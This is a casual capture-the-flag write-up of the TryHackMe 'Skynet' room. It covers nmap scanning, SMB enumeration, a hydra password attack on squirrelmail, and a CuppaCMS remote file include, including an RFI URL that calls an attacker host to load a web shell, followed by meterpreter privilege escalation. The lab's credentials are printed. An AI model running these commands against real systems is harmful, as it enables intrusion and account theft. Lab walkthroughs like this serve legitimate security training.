[Skynet] – TryHackMe

I’m rebuilding the Skynet CTF on TryHackMe from vague notes.  So, I apologize for anything that’s mildly off.  I’ve been drinking and it was a few days ago. We always start off with enumeration, portscan, banner grab, service check, the usual. My ctf_quick alias is [code]sudo nmap -sS -sV -O -vvv -T4 –script=vulners –script=intrusive –script-timeout=2m -oA ctf_quick[/code], I often attach a few more flags, if needed, namely [code]-p- -Pn[/code], if I want to be sure to check all ports or if the target doesn’t respond to ICMP requests. My ctf_deep is the same, mostly, script-timeout is set up at 5 minutes, there’s no -T4 flag, version intensity is set to 9 and for both, I have a [code]alias BRUTE=’–script-args userdb=top-probable,passdb=1000worst'[/code], that I can pop in there. Though, generally I’ll only pop that into the deep scan with the longer time out, for obvious reasons.

It has a webserver, so we go ahead and launch a directory scanner too. I either used directory 2.3 lowercase medium or big from SecLists/Discovery/Web-Content . It picks up a few folders, most of which 403; admin, config, ai for sure.. there’s also css and js, I forget if they 403’d or not, but either way, they weren’t enlightening. /squirrelmail sticks out, however, we know what that is and the questions ask about email content. So, it’s a great place to start. Just bear in mind, e-mail accounts may not have shell access and/or authorization may vary.

When nmap finishes, we notice there’s a samba share, we enumerate it, it picks up a few shares and a user ‘milesdyson’, accessing the only share that allows anonymous access reveals log1.txt and it looks like a wordlist. The CTF is Skynet and it’s all terminator themed (miles dyson, etc.. etc.). We set hydra to work on squirrelmail using the milesdyson user and the wordlist and it cracks with a password of cyborg007haloterminator (this CTF is considered easy). Logging in, we see emails from the host itself regarding milesdyson’s samba password, so we write that down. )s{A&2Z=F^n_E.B` 

We note emails from a potential user ‘serenakogan’ and a binary encoded email, we decode it, it’s mostly uninteresting. says ‘balls have zero to me to me to me to me to me to me to me’. serenakogan’s next e-mail is similar, almost the same. We check milesdyon’s samba share with his credentials and they work, yay. He’s messaged himself about finishing the new CMS and mention a string of nonsensical characters 45kra24zxs28v3yd. Given that the question asks about a hidden directory and squirrelmail, nor are the others very hidden at all, plus the fact the important.txt mentions finishing a CMS, we try and browse to that folder and it exists. Looks benign, but we go ahead and brute force directories here too and we find another one, administrator, it’s running CuppaCMS. So, we set the string aside in a note, it could still be a password or need to be cracked or decoded.

We look for vulnerabilities for CuppaCMS and find there’s a nasty file include vulnerability (allows both remote file include and local file include). Local is easier to perform, so we check the obvious things, /etc/passwd (confirm actual user accounts that exist on the host, CuppaCMS reveals MySQL credentials, root:password123 . Informative, but nothing ground breaking, we go ahead with a remote file include. I used weevely3, but you can use whatever. Make the RFI available with python3’s built-in webserver (or any webserver). My include looked like this: http://ctf-target/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://attacker:8000/shell.txt?

I used the shell to throw down a meterpreter and went straight for root using exploit/linux/local/ufo_privilege_escalation. It worked. Working backwards another user was admin:b686468aec2c71e1783375763dca9b7e

Sorry for the crap write-up.